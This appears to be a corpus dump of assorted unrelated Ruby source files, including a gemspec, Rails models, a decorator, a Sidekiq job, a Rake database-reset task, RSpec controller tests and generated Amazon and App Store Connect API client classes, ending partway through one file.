Gem::Specification.new do |spec|
spec.name = "bitrix_webhook"
spec.version = BitrixWebhook::VERSION
spec.authors = ["Serhii Danovskyi"]
spec.email = ["jipebed@gmail.com"]
spec.summary = "bitrix24 webhook rails"
spec.description = "bitrix24 webhook rails gem"
spec.homepage = "https://github.com/Serhii-Danovsky/bitrix_webhook"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "https://rubygems.org"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 10.0"
end
| 36.194444 | 96 | 0.668457 |
38d1f1a4408d8652f4faa3f9a45de967d37923c7 | 431 | require 'datamappify/data/criteria/relational/concerns/find'
require 'datamappify/data/criteria/active_record/criteria_method'
module Datamappify
module Data
module Criteria
module ActiveRecord
class Find < CriteriaMethod
include Relational::Concerns::Find
private
def record
records_scope.where(criteria).first
end
end
end
end
end
end
| 20.52381 | 65 | 0.663573 |
b9089be7bb923552a695d6f6692dcd9ad12ff1f2 | 1,030 | namespace :db do
desc 'Erase all tables'
task :clear => :environment do
HostEnv.safe do
clear_database
end
end
desc 'Clear the database, run migrations and basic seeds (not users, teams, roles)'
task :reseed => :clear do
Rake::Task['db:structure_load'].invoke
Rake::Task['data:migrate'].invoke
end
task :structure_load => :environment do
structure_file = "#{Rails.root}/db/structure.sql"
command = "psql -d correspondence_platform_development < #{structure_file}"
system command
end
def clear_database
conn = ActiveRecord::Base.connection
tables = conn.tables
tables.each do |table|
puts "Deleting #{table}"
conn.drop_table(table, force: :cascade)
end
enum_types = %w(
assignment_type
attachment_type
requester_type
state
user_role
team_roles
cases_delivery_methods
search_query_type
)
enum_types.each do |type|
conn.execute("DROP TYPE IF EXISTS #{type}")
end
end
end
| 21.914894 | 85 | 0.659223 |
5d99c027a08481366da202a9d4bf4c2806a57117 | 420 | class Plan < ActiveRecord::Base
has_many :teams
validates_presence_of :name
validates_presence_of :max
validates_presence_of :price
validates_uniqueness_of :name
validates_length_of :name, :maximum => 255
validates_numericality_of :max, :less_than_or_equal_to => 65535
validates_numericality_of :price
def localize
self.name = I18n.t(self.class.name.downcase + '.' + self.name)
self
end
end
| 26.25 | 66 | 0.761905 |
08472c9aecafe17629a0438db6d8c012d45e603d | 909 | # frozen_string_literal: true
class TakedownJob
include Sidekiq::Worker
sidekiq_options queue: 'high_prio', lock: :until_executing, lock_args_method: :lock_args
def self.lock_args(args)
[args[0]]
end
def perform(id, approver, del_reason)
@takedown = Takedown.find(id)
@approver = User.find(approver)
@takedown.approver_id = @approver.id
CurrentUser.as(@approver) do
ModAction.log(:takedown_process, {takedown_id: @takedown.id})
end
CurrentUser.as_system do
@takedown.status = @takedown.calculated_status
@takedown.save!
@takedown.actual_posts.find_each do |p|
if @takedown.should_delete(p.id)
next if p.is_deleted?
p.delete!("takedown ##{@takedown.id}: #{del_reason}", { force: true })
else
next unless p.is_deleted?
p.undelete!({ force: true })
end
end
end
end
end
| 25.971429 | 90 | 0.651265 |
391b121f385de9eb0a90dd9a70dd87eadb6feca4 | 1,696 | description 'YAML based user storage'
require 'yaml/store'
class YamlfileService < User::Service
def initialize(config)
FileUtils.mkpath(File.dirname(config[:store]))
@store = ::YAML::Store.new(config[:store])
end
# @override
def find(name)
@store.transaction(true) do |store|
user = store[name]
user && User.new(name, user['email'], user['groups'])
end
end
# @override
def authenticate(name, password)
@store.transaction(true) do |store|
user = store[name]
raise AuthenticationError, :wrong_user_or_pw.t if !user || user['password'] != crypt(password)
User.new(name, user['email'], user['groups'])
end
end
# @override
def signup(user, password)
@store.transaction do |store|
raise :user_already_exists.t(name: user.name) if store[user.name]
store[user.name] = {
'email' => user.email,
'password' => crypt(password),
'groups' => user.groups.to_a
}
end
end
# @override
def update(user)
@store.transaction do |store|
raise NameError, "User #{user.name} not found" if !store[user.name]
store[user.name]['email'] = user.email
store[user.name]['groups'] = user.groups.to_a
end
end
# @override
def change_password(user, oldpassword, password)
@store.transaction do |store|
check do |errors|
errors << 'User not found' if !store[user.name]
errors << :wrong_password.t if crypt(oldpassword) != store[user.name]['password']
end
store[user.name]['password'] = crypt(password)
end
end
private
def crypt(s)
s.blank? ? s : sha256(s)
end
end
User::Service.register :yamlfile, YamlfileService
| 25.313433 | 100 | 0.638561 |
3954906c00f4ee5aa4fd89f872c8bd19ea6cf837 | 904 | #
# Cookbook:: sbp_cloudmonkey
# Attribute:: default
#
# Copyright:: Schuberg Philis
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
default['sbp_cloudmonkey']['source'] = nil
default['sbp_cloudmonkey']['version'] = '6.1.0'
default['sbp_cloudmonkey']['binary'] = '/usr/local/bin/cmk'
default['sbp_cloudmonkey']['create_symlink'] = true
default['sbp_cloudmonkey']['link'] = '/usr/local/bin/cloudmonkey'
| 34.769231 | 74 | 0.742257 |
f82b2ec270d68c2dbbb7f157777f1f46860cf1e0 | 1,500 | class AuthorityDecorator < Draper::Decorator
delegate_all
def internal_position
I18n.t("authorities.positions.#{object.internal_position}")
end
def full_name
"#{object.person.surname}, #{object.person.name}"
end
def bloc_party
object.person.try :bloque
end
def edit_url
h.edit_authority_path object
end
def dni
object.person.cuit_or_dni || 'S/N'
end
def phone
object.person.phone || 'S/N'
end
def picture
if object.person.picture.present?
h.image_tag h.image_path('no_image.jpg'),
class: 'profile-user-img img-responsive img-circle',
alt: 'User profile picture'
else
h.image_tag h.image_path('no_image.jpg'),
class: 'profile-user-img img-responsive img-circle',
alt: 'User profile picture'
end
end
def assumption_date
object.assumption_date.to_default_s if object.assumption_date.present?
end
def recess_date
object.recess_date.to_default_s if object.recess_date.present?
end
def authority_positions
h.options_for_select(
[
['Presidente', :president],
['Vicepresidente Primero', :first_vicepresident],
['Vicepresidente Segundo', :second_vicepresident],
['Vicepresidente Tercero', :third_vicepresident],
['Prosecretario', :prosecutor],
['Secretario', :secretary],
], object.internal_position)
end
def authority_periods
Periodo.order(hasta: :desc).map { |period| [period, period.id] }
end
end
| 23.4375 | 74 | 0.682 |
6ae12db8f8e19330195491b6049c88078504ee11 | 495 | require "cronofy/version"
require "cronofy/errors"
require "cronofy/types"
require "cronofy/auth"
require "cronofy/client"
require "cronofy/response_parser"
require 'json'
module Cronofy
def self.api_url
@api_url ||= (ENV['CRONOFY_API_URL'] || "https://api.cronofy.com")
end
def self.api_url=(value)
@api_url = value
end
def self.app_url
@app_url ||= (ENV['CRONOFY_APP_URL'] || "https://app.cronofy.com")
end
def self.app_url=(value)
@app_url = value
end
end
| 19.038462 | 70 | 0.690909 |
089128dfb1e249f9a84335c63564bcb55162d521 | 14,794 | # frozen_string_literal: true
require 'rails_helper'
describe AssignmentsController, type: :request do
let(:slug_params) { 'Wikipedia_Fellows/Basket-weaving_fellows_(summer_2018)' }
let!(:course) { create(:course, id: 1, submitted: true, slug: slug_params) }
let!(:user) { create(:user) }
before do
stub_wiki_validation
course.campaigns << Campaign.first
allow_any_instance_of(ApplicationController).to receive(:current_user).and_return(user)
end
describe 'DELETE #destroy' do
context 'when the user owns the assignment' do
let(:assignment) do
create(:assignment, course_id: course.id, user_id: user.id,
article_title: 'Selfie', role: 0)
end
before do
expect_any_instance_of(WikiCourseEdits).to receive(:remove_assignment)
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
end
context 'when the assignment_id is provided' do
let(:params) { { course_slug: course.slug } }
before do
delete "/assignments/#{assignment.id}", params: { id: assignment.id }.merge(params)
end
it 'destroys the assignment' do
expect(Assignment.count).to eq(0)
end
it 'renders a json response' do
expect(response.body).to eq({ assignmentId: assignment.id }.to_json)
end
end
context 'when the assignment_id is not provided' do
let(:params) do
{ course_slug: course.slug, user_id: user.id,
article_title: assignment.article_title, role: assignment.role }
end
before do
delete "/assignments/#{assignment.id}", params: { id: 'undefined' }.merge(params)
end
# This happens when an assignment is deleted right after it has been created.
# The React frontend will not have an assignment_id until
# it gets refreshed from the server.
it 'deletes the assignment' do
expect(Assignment.count).to eq(0)
end
end
end
context 'when the user does not have permission do destroy the assignment' do
let(:assignment) { create(:assignment, course_id: course.id, user_id: user.id + 1) }
let(:params) { { course_slug: course.slug } }
before do
delete "/assignments/#{assignment.id}", params: { id: assignment }.merge(params)
end
it 'does not destroy the assignment' do
expect(Assignment.count).to eq(1)
end
it 'renders a 401 status' do
expect(response.status).to eq(401)
end
end
context 'when parameters for a non-existent assignment are provided' do
let(:assignment) { create(:assignment, course_id: course.id, user_id: user.id) }
let(:params) do
{ course_slug: course.slug, user_id: user.id + 1,
article_title: assignment.article_title, role: assignment.role }
end
before do
delete "/assignments/#{/undefined/}", params: { id: 'undefined' }.merge(params)
end
# This happens when an assignment is deleted right after it has been created.
# The React frontend will not will not have an assignment_id until
# it gets refreshed from the server.
it 'renders a 404' do
expect(response.status).to eq(404)
end
end
end
describe 'POST #create' do
context 'when the user has permission to create the assignment' do
let(:course) do
create(:course, slug: 'Unasp/Teorias_da_Comunicaรงรฃo_(term_1)', submitted: true)
end
let(:assignment_params) do
{ user_id: user.id, course_slug: course.slug, title: 'jalapeรฑo', role: 0, format: :json }
end
context 'when the article does not exist' do
it 'imports the article and associates it with the assignment' do
expect(Article.find_by(title: 'Jalapeรฑo')).to be_nil
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: assignment_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.article.title).to eq('Jalapeรฑo')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
expect(assignment.article.rating).not_to be_nil
expect(assignment.article.updated_at).not_to be_nil
end
end
end
context 'when the assignment is for Wiktionary' do
let!(:en_wiktionary) { create(:wiki, language: 'en', project: 'wiktionary') }
let(:wiktionary_params) do
{ user_id: user.id, course_slug: course.slug, title: 'selfie', role: 0,
language: 'en', project: 'wiktionary', format: :json }
end
it 'imports the article with a lower-case title' do
expect(Article.find_by(title: 'selfie')).to be_nil
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: wiktionary_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.article.title).to eq('selfie')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
end
end
end
context 'when the assignment is for Wikisource' do
let!(:www_wikisource) { create(:wiki, language: 'www', project: 'wikisource') }
let(:wikisource_params) do
{ user_id: user.id, course_slug: course.slug, title: 'Heyder Cansa', role: 0,
language: 'www', project: 'wikisource', format: :json }
end
before do
expect(Article.find_by(title: 'Heyder Cansa')).to be_nil
end
it 'imports the article' do
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: wikisource_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.article.title).to eq('Heyder_Cansa')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
end
end
end
context 'when the assignment is for Wikimedia incubator' do
let!(:wikimedia_incubator) { create(:wiki, language: 'incubator', project: 'wikimedia') }
let(:wikimedia_params) do
{ user_id: user.id, course_slug: course.slug, title: 'Wp/kiu/Heyder Cansa', role: 0,
language: 'incubator', project: 'wikimedia', format: :json }
end
before do
expect(Article.find_by(title: 'Wp/kiu/Heyder Cansa')).to be_nil
end
it 'imports the article' do
VCR.use_cassette 'assignment_import' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: wikimedia_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.article.title).to eq('Wp/kiu/Heyder_Cansa')
expect(assignment.article.namespace).to eq(Article::Namespaces::MAINSPACE)
end
end
end
context 'when the article exists' do
before do
create(:article, title: 'Pizza', namespace: Article::Namespaces::MAINSPACE)
end
let(:assignment_params_with_language_and_project) do
{ user_id: user.id, course_slug: course.slug, title: 'pizza',
role: 0, language: 'es', project: 'wikibooks', format: :json }
end
before do
create(:article, title: 'Pizza', wiki_id: es_wikibooks.id,
namespace: Article::Namespaces::MAINSPACE)
end
let(:es_wikibooks) { create(:wiki, language: 'es', project: 'wikibooks') }
it 'sets assignments ivar with a default wiki' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
VCR.use_cassette 'assignment_import' do
post '/assignments', params: assignment_params
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.wiki.language).to eq('en')
expect(assignment.wiki.project).to eq('wikipedia')
end
end
it 'renders a json response' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
VCR.use_cassette 'assignment_import' do
post '/assignments', params: assignment_params
end
json_response = Oj.load(response.body)
# response makes created_at differ by milliseconds, which is weird,
# so test attrs that actually matter rather than whole record
expect(json_response['article_title'])
.to eq(Assignment.last.article_title)
expect(json_response['user_id']).to eq(Assignment.last.user_id)
expect(json_response['role']).to eq(Assignment.last.role)
end
it 'sets the wiki based on language and project params' do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
post '/assignments', params: assignment_params_with_language_and_project
assignment = assigns(:assignment)
expect(assignment).to be_a_kind_of(Assignment)
expect(assignment.wiki_id).to eq(es_wikibooks.id)
end
end
end
context 'when the user does not have permission to create the assignment' do
let(:course) { create(:course) }
let(:assignment_params) do
{ user_id: user.id + 1, course_slug: course.slug, title: 'pizza', role: 0 }
end
before do
post '/assignments', params: assignment_params
end
it 'does not create the assignment' do
expect(Assignment.count).to eq(0)
end
it 'renders a 401 status' do
expect(response.status).to eq(401)
end
end
context 'when the wiki params are not valid' do
let(:course) { create(:course) }
let(:invalid_wiki_params) do
{ user_id: user.id, course_slug: course.slug, title: 'Pikachu', role: 0,
language: 'en', project: 'bulbapedia', format: :json }
end
let(:subject) do
post '/assignments', params: invalid_wiki_params
end
it 'returns a 404 error message' do
subject
expect(response.body).to include('Invalid assignment')
expect(response.status).to eq(404)
end
end
context 'when the same assignment already exists' do
let(:title) { 'My article' }
let!(:assignment) do
create(:assignment, course_id: course.id, user_id: user.id, role: 0, article_title: title)
end
let(:duplicate_assignment_params) do
{ user_id: user.id, course_slug: course.slug, title: title, role: 0, format: :json }
end
before do
VCR.use_cassette 'assignment_import' do
post '/assignments', params: duplicate_assignment_params
end
end
it 'renders an error message with the article title' do
expect(response.status).to eq(500)
expect(response.body).to include('My_article')
end
end
context 'when a case-variant of the assignment already exists' do
let(:title) { 'My article' }
let(:variant_title) { 'MY ARTICLE' }
let!(:assignment) do
create(:assignment, course_id: course.id, user_id: user.id, role: 0, article_title: title)
end
let(:case_variant_assignment_params) do
{ user_id: user.id, course_slug: course.slug, title: variant_title, role: 0, format: :json }
end
before do
expect_any_instance_of(WikiCourseEdits).to receive(:update_assignments)
expect_any_instance_of(WikiCourseEdits).to receive(:update_course)
VCR.use_cassette 'assignment_import' do
post '/assignments', params: case_variant_assignment_params
end
end
it 'creates the case-variant assignment' do
expect(response.status).to eq(200)
expect(Assignment.last.article_title).to eq('MY_ARTICLE')
end
end
end
describe 'PATCH #update' do
let(:assignment) { create(:assignment, course_id: course.id, role: 0) }
let(:request_params) do
{ course_id: course.id, id: assignment.id, user_id: user.id, format: :json }
end
context 'when the update succeeds' do
it 'renders a 200' do
put "/assignments/#{assignment.id}", params: request_params
expect(response.status).to eq(200)
end
end
context 'when the article is already assigned to a user' do
it 'renders a 409' do
assignment.update(user_id: 1)
put "/assignments/#{assignment.id}", params: request_params
expect(response.status).to eq(409)
end
end
context 'when the update fails' do
it 'renders a 500' do
allow_any_instance_of(Assignment).to receive(:save).and_return(false)
put "/assignments/#{assignment.id}", params: request_params
expect(response.status).to eq(500)
end
end
end
describe 'PATCH #update_status' do
let(:assignment) { create(:assignment, course: course, role: 0) }
let(:request_params) do
{ course_id: course.id, id: assignment.id, user_id: user.id, format: :json, status: status }
end
context 'when a status param is provided' do
let(:status) { 'in_progress' }
it 'renders a 200' do
patch "/assignments/#{assignment.id}/status", params: request_params
expect(response.status).to eq(200)
expect(assignment.reload.status).to eq(status)
end
end
context 'when no status param is provided' do
let(:status) { nil }
it 'renders a 422' do
patch "/assignments/#{assignment.id}/status", params: request_params
expect(response.status).to eq(422)
end
end
end
end
| 37.836317 | 100 | 0.645532 |
bf072ac49693e8c1ad6624b6761fb6e3a0568fa7 | 77 | # frozen_string_literal: true
module ProblemDetails
VERSION = '0.2.2'
end
| 12.833333 | 29 | 0.753247 |
28acf9ff86bbc4ed6a026cae63aa613f78cc05bc | 332 | class NotifyingCountryForm
include ActiveModel::Model
include ActiveModel::Attributes
include ActiveModel::Serialization
attribute :country, :string
validates :country, inclusion: { in: Country.notifying_countries.map(&:last) }
def self.from(investigation)
new(country: investigation.notifying_country)
end
end
| 23.714286 | 80 | 0.78012 |
08c0567b4ae3e1b1f0a8d019452c73b609e144c8 | 2,301 | require_relative '../model'
require_relative './review_submission_item'
module Spaceship
class ConnectAPI
class ReviewSubmission
include Spaceship::ConnectAPI::Model
attr_accessor :platform
attr_accessor :state
attr_accessor :submitted_date
attr_accessor :app_store_version_for_review
attr_accessor :items
attr_accessor :last_updated_by_actor
attr_accessor :submitted_by_actor
module ReviewSubmissionState
CANCELING = "CANCELING"
COMPLETE = "COMPLETE"
IN_REVIEW = "IN_REVIEW"
READY_FOR_REVIEW = "READY_FOR_REVIEW"
WAITING_FOR_REVIEW = "WAITING_FOR_REVIEW"
end
attr_mapping({
"platform" => "platform",
"state" => "state",
"submittedDate" => "submitted_date",
"appStoreVersionForReview" => "app_store_version_for_review",
"items" => "items",
"lastUpdatedByActor" => "last_updated_by_actor",
"submittedByActor" => "submitted_by_actor",
})
def self.type
return "reviewSubmissions"
end
#
# API
#
# appStoreVersionForReview,items,submittedByActor,lastUpdatedByActor
def self.get(client: nil, review_submission_id:, includes: nil)
client ||= Spaceship::ConnectAPI
resp = client.get_review_submission(review_submission_id: review_submission_id, includes: includes)
return resp.to_models.first
end
def submit_for_review(client: nil)
client ||= Spaceship::ConnectAPI
attributes = { submitted: true }
resp = client.patch_review_submission(review_submission_id: id, attributes: attributes)
return resp.to_models.first
end
def cancel_submission(client: nil)
client ||= Spaceship::ConnectAPI
attributes = { canceled: true }
resp = client.patch_review_submission(review_submission_id: id, attributes: attributes)
return resp.to_models.first
end
def add_app_store_version_to_review_items(client: nil, app_store_version_id:)
client ||= Spaceship::ConnectAPI
resp = client.post_review_submission_item(review_submission_id: id, app_store_version_id: app_store_version_id)
return resp.to_models.first
end
end
end
end
| 31.094595 | 119 | 0.677532 |
1cea1cd2f096c6835597c00f41dce4ff1e7bf179 | 1,094 | require 'test_helper'
class TopicsControllerTest < ActionDispatch::IntegrationTest
setup do
@topic = topics(:one)
end
test "should get index" do
get topics_url
assert_response :success
end
test "should get new" do
get new_topic_url
assert_response :success
end
test "should create topic" do
assert_difference('Topic.count') do
post topics_url, params: { topic: { about: @topic.about, title: @topic.title, user_id: @topic.user_id } }
end
assert_redirected_to topic_url(Topic.last)
end
test "should show topic" do
get topic_url(@topic)
assert_response :success
end
test "should get edit" do
get edit_topic_url(@topic)
assert_response :success
end
test "should update topic" do
patch topic_url(@topic), params: { topic: { about: @topic.about, title: @topic.title, user_id: @topic.user_id } }
assert_redirected_to topic_url(@topic)
end
test "should destroy topic" do
assert_difference('Topic.count', -1) do
delete topic_url(@topic)
end
assert_redirected_to topics_url
end
end
| 22.326531 | 117 | 0.698355 |
ffb504cc5732e618eeaa391b015f010ea642e923 | 404 | require 'spec_helper'
describe 'User visits the authentication log page' do
let(:user) { create(:user) }
before do
sign_in(user)
visit(audit_log_profile_path)
end
it 'shows correct menu item' do
expect(find('.sidebar-top-level-items > li.active')).to have_content('Authentication log')
expect(page).to have_selector('.sidebar-top-level-items > li.active', count: 1)
end
end
| 23.764706 | 94 | 0.707921 |
017121a1253087cada852517778b0ef2b98a4ba7 | 10,178 | =begin
#OpenAPI Petstore
#This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.0.0-SNAPSHOT
=end
require 'cgi'
module Petstore
class StoreApi
attr_accessor :api_client
def initialize(api_client = ApiClient.default)
@api_client = api_client
end
# Delete purchase order by ID
# For valid response try integer IDs with value < 1000. Anything above 1000 or nonintegers will generate API errors
# @param order_id [String] ID of the order that needs to be deleted
# @param [Hash] opts the optional parameters
# @return [nil]
def delete_order(order_id, opts = {})
delete_order_with_http_info(order_id, opts)
nil
end
# Delete purchase order by ID
# For valid response try integer IDs with value < 1000. Anything above 1000 or nonintegers will generate API errors
# @param order_id [String] ID of the order that needs to be deleted
# @param [Hash] opts the optional parameters
# @return [Array<(nil, Integer, Hash)>] nil, response status code and response headers
def delete_order_with_http_info(order_id, opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.delete_order ...'
end
# verify the required parameter 'order_id' is set
if @api_client.config.client_side_validation && order_id.nil?
fail ArgumentError, "Missing the required parameter 'order_id' when calling StoreApi.delete_order"
end
# resource path
local_var_path = '/store/order/{order_id}'.sub('{' + 'order_id' + '}', CGI.escape(order_id.to_s).gsub('%2F', '/'))
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body]
# return_type
return_type = opts[:debug_return_type]
# auth_names
auth_names = opts[:debug_auth_names] || []
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:DELETE, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#delete_order\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
# Returns pet inventories by status
# Returns a map of status codes to quantities
# @param [Hash] opts the optional parameters
# @return [Hash<String, Integer>]
def get_inventory(opts = {})
data, _status_code, _headers = get_inventory_with_http_info(opts)
data
end
# Returns pet inventories by status
# Returns a map of status codes to quantities
# @param [Hash] opts the optional parameters
# @return [Array<(Hash<String, Integer>, Integer, Hash)>] Hash<String, Integer> data, response status code and response headers
def get_inventory_with_http_info(opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.get_inventory ...'
end
# resource path
local_var_path = '/store/inventory'
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/json'])
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body]
# return_type
return_type = opts[:debug_return_type] || 'Hash<String, Integer>'
# auth_names
auth_names = opts[:debug_auth_names] || ['api_key']
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#get_inventory\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
# Find purchase order by ID
# For valid response try integer IDs with value <= 5 or > 10. Other values will generated exceptions
# @param order_id [Integer] ID of pet that needs to be fetched
# @param [Hash] opts the optional parameters
# @return [Order]
def get_order_by_id(order_id, opts = {})
data, _status_code, _headers = get_order_by_id_with_http_info(order_id, opts)
data
end
# Find purchase order by ID
# For valid response try integer IDs with value <= 5 or > 10. Other values will generated exceptions
# @param order_id [Integer] ID of pet that needs to be fetched
# @param [Hash] opts the optional parameters
# @return [Array<(Order, Integer, Hash)>] Order data, response status code and response headers
def get_order_by_id_with_http_info(order_id, opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.get_order_by_id ...'
end
# verify the required parameter 'order_id' is set
if @api_client.config.client_side_validation && order_id.nil?
fail ArgumentError, "Missing the required parameter 'order_id' when calling StoreApi.get_order_by_id"
end
if @api_client.config.client_side_validation && order_id > 5
fail ArgumentError, 'invalid value for "order_id" when calling StoreApi.get_order_by_id, must be smaller than or equal to 5.'
end
if @api_client.config.client_side_validation && order_id < 1
fail ArgumentError, 'invalid value for "order_id" when calling StoreApi.get_order_by_id, must be greater than or equal to 1.'
end
# resource path
local_var_path = '/store/order/{order_id}'.sub('{' + 'order_id' + '}', CGI.escape(order_id.to_s).gsub('%2F', '/'))
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/xml', 'application/json'])
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body]
# return_type
return_type = opts[:debug_return_type] || 'Order'
# auth_names
auth_names = opts[:debug_auth_names] || []
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#get_order_by_id\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
# Place an order for a pet
# @param order [Order] order placed for purchasing the pet
# @param [Hash] opts the optional parameters
# @return [Order]
def place_order(order, opts = {})
data, _status_code, _headers = place_order_with_http_info(order, opts)
data
end
# Place an order for a pet
# @param order [Order] order placed for purchasing the pet
# @param [Hash] opts the optional parameters
# @return [Array<(Order, Integer, Hash)>] Order data, response status code and response headers
def place_order_with_http_info(order, opts = {})
if @api_client.config.debugging
@api_client.config.logger.debug 'Calling API: StoreApi.place_order ...'
end
# verify the required parameter 'order' is set
if @api_client.config.client_side_validation && order.nil?
fail ArgumentError, "Missing the required parameter 'order' when calling StoreApi.place_order"
end
# resource path
local_var_path = '/store/order'
# query parameters
query_params = opts[:query_params] || {}
# header parameters
header_params = opts[:header_params] || {}
# HTTP header 'Accept' (if needed)
header_params['Accept'] = @api_client.select_header_accept(['application/xml', 'application/json'])
# HTTP header 'Content-Type'
header_params['Content-Type'] = @api_client.select_header_content_type(['application/json'])
# form parameters
form_params = opts[:form_params] || {}
# http body (model)
post_body = opts[:debug_body] || @api_client.object_to_http_body(order)
# return_type
return_type = opts[:debug_return_type] || 'Order'
# auth_names
auth_names = opts[:debug_auth_names] || []
new_options = opts.merge(
:header_params => header_params,
:query_params => query_params,
:form_params => form_params,
:body => post_body,
:auth_names => auth_names,
:return_type => return_type
)
data, status_code, headers = @api_client.call_api(:POST, local_var_path, new_options)
if @api_client.config.debugging
@api_client.config.logger.debug "API called: StoreApi#place_order\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}"
end
return data, status_code, headers
end
end
end
| 37.557196 | 157 | 0.669876 |
38dd2474ca16a873ac97e1249a13052216f202f5 | 7,094 | =begin
#Selling Partner API for Orders
#The Selling Partner API for Orders helps you programmatically retrieve order information. These APIs let you develop fast, flexible, custom applications in areas like order synchronization, order research, and demand-based decision support tools.
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.24
=end
require 'date'
module AmzSpApi::OrdersApiModel
# The shipping address for the order.
class OrderAddress
# An Amazon-defined order identifier, in 3-7-7 format.
attr_accessor :amazon_order_id
attr_accessor :shipping_address
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'amazon_order_id' => :'AmazonOrderId',
:'shipping_address' => :'ShippingAddress'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'amazon_order_id' => :'Object',
:'shipping_address' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::OrdersApiModel::OrderAddress` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::OrdersApiModel::OrderAddress`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'amazon_order_id')
self.amazon_order_id = attributes[:'amazon_order_id']
end
if attributes.key?(:'shipping_address')
